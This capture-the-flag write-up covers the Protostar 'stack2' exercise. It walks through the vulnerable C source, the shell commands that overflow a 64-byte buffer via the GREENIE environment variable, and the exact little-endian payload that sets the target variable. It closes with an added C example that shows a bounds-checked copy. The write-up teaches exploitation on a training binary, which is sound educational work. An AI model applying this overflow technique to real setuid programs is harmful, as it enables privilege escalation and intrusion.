protostar - stack 2
Let's check the file type of our binary:
$ file stack2
stack2: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped
Let's try running it:
$ ./stack2
stack2: please set the GREENIE environment variable
Let's view the source code to understand what the program does:
    #include <stdlib.h>
    #include <unistd.h>
    #include <stdio.h>
    #include <string.h>
    #include <err.h>      /* needed for errx() */

    int main(int argc, char **argv)
    {
        volatile int modified;
        char buffer[64];
        char *variable;

        /* the only input is the GREENIE environment variable */
        variable = getenv("GREENIE");

        if (variable == NULL) {
            errx(1, "please set the GREENIE environment variable\n");
        }

        modified = 0;

        /* unbounded copy: no check that the value fits in 64 bytes */
        strcpy(buffer, variable);

        if (modified == 0x0d0a0d0a) {
            printf("you have correctly modified the variable\n");
        } else {
            printf("Try again, you got 0x%08x\n", modified);
        }
    }
To pass this challenge we need to overwrite the modified variable with 0x0d0a0d0a.
This challenge is very similar to the previous one. We need to craft the environment variable GREENIE, whose value is stored in variable:
    variable = getenv("GREENIE");
Let's set an environment variable named GREENIE:
$ export GREENIE=AAAABBBBCCCCDDDD
$ ./stack2
Try again, you got 0x00000000
$ echo $GREENIE
AAAABBBBCCCCDDDD
Now we have to overwrite modified, and GREENIE is our only way in, because
    strcpy(buffer, variable);
copies the data from GREENIE into buffer. strcpy does no bounds checking: it copies until it reaches the terminating NUL, however long the source is, so a value longer than the buffer overflows it. We need 64 bytes of data to fill the buffer and reach the modified variable.
Let's try to overwrite it with random junk:
$ export GREENIE=$(python -c "print('A'*64+'BBBB')")
$ echo $GREENIE
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
$ ./stack2
Try again, you got 0x42424242
The four B bytes (0x42) landed in modified. The target is a 32-bit integer on a little-endian machine, so the four bytes after the 64-byte filler must be 0x0d0a0d0a written least-significant byte first, i.e. \x0a\x0d\x0a\x0d. Let's exploit it:
$ export GREENIE=$(python -c "print('A'*64+'\x0a\x0d\x0a\x0d')")
$ ./stack2
you have correctly modified the variable
Done! We have completed "stack2".
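As an added example (not part of the original writeup or the Protostar source), the frame layout stack2 relies on modelled as a struct, a helper that shows why the bytes land in modified in the order the payload above uses, and a bounded replacement for the unchecked strcpy that refuses any GREENIE value too long for the buffer. The struct and function names are assumptions made for this illustration.

```c
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical model of the stack2 frame: the 64-byte buffer sits directly
 * before the 32-bit variable that the overflow reaches. */
struct frame {
    char buffer[64];
    uint32_t modified;
};

/* Interpret four bytes as a little-endian 32-bit value, which is how the
 * overflowed bytes are read back from `modified` on the Intel 80386 target. */
uint32_t le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Bounded replacement for strcpy(buffer, variable): rejects any value that
 * does not fit in buffer together with its NUL terminator, so modified can
 * never be written. Returns 0 on success, -1 when the value is rejected. */
int copy_greenie_checked(struct frame *f, const char *value)
{
    size_t len = strlen(value);
    if (len >= sizeof f->buffer) {
        return -1;                  /* would overflow into modified */
    }
    memcpy(f->buffer, value, len + 1);
    return 0;
}

int main(void)
{
    struct frame f;
    memset(&f, 0, sizeof f);
    const char *value = getenv("GREENIE");
    if (value == NULL) {
        fprintf(stderr, "please set the GREENIE environment variable\n");
        return 1;
    }
    if (copy_greenie_checked(&f, value) != 0) {
        fprintf(stderr, "GREENIE too long (max %zu bytes)\n", sizeof f.buffer - 1);
        return 1;
    }
    printf("modified is still 0x%08x\n", f.modified);
    return 0;
}
```

Run with the 68-byte GREENIE from the writeup and the checked copy refuses it, leaving modified at zero; the le32 helper reproduces both the 0x42424242 seen with the BBBB filler and the 0x0d0a0d0a target.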